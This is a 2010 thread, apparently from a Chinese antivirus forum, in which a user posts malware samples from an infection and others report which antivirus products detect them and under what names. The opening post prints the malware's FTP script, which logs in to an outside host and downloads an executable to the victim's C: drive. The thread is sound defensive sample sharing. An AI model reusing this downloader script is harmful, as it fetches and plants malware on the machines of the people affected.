11.9样本红伞杀了

显示全部楼层 · 发表于 2010-11-9 12:36:24

本帖最后由 diannao6051 于 2010-11-10 16:25 编辑

这几天电脑病毒爆发了在 c:\GZ 用记事本打开GZ文件
内容:
open dasj.3322.org
123
123
binary
get z.exe c:\aa.exe
bye

于是试试打开dasj.3322.org 网页
是用另一个批处理引导的打开ftp://dasj.3322.org
用户名和密码为123
不过这个ftp之后就关了

打包上传了红伞都报

显示全部楼层 · 发表于 2010-11-9 12:43:30

本帖最后由 bbs2811125 于 2010-11-9 12:44 编辑

下载文件：456.rar
木马名称：Win32.Troj.Undef.(kcloud)...
这个木马可能破坏您的电脑系统，窃取账号密码
下载文件：muma.rar
木马名称：Win32.Hack.Agent.ay.(kcloud...
这个木马可能破坏您的电脑系统，窃取账号密码
第三个解压FSkill，金山卫士报安全

显示全部楼层 · 发表于 2010-11-9 12:44:16

感谢楼主提供的样本。

p.s. 465.rar；oule.rar已经重新打包，样本上报卡巴斯基。

显示全部楼层 · 发表于 2010-11-9 12:44:49

显示全部楼层 · 发表于 2010-11-9 12:53:02

G DATA 下载时全杀~

显示全部楼层 · 发表于 2010-11-9 13:04:18

MUMA.EXE
BackDoor-CEP.gen.cn
其他两个过VSE

显示全部楼层 · 发表于 2010-11-9 13:04:59

本帖最后由 moreo 于 2010-11-9 13:07 编辑

avast kill all

显示全部楼层 · 发表于 2010-11-9 13:21:25

本帖最后由 hansyu 于 2010-11-9 13:25 编辑

panda
muma.rar - Trj/Downloader.MDW
miss 2x to xandora

显示全部楼层 · 发表于 2010-11-9 13:24:53

G DATA还是蛮牛的

显示全部楼层 · 发表于 2010-11-9 13:25:48

muma.rar 沒報

[病毒样本] 11.9样本红伞杀了

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块

[病毒样本] 11.9样本 红伞杀了

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块

[病毒样本] 11.9样本红伞杀了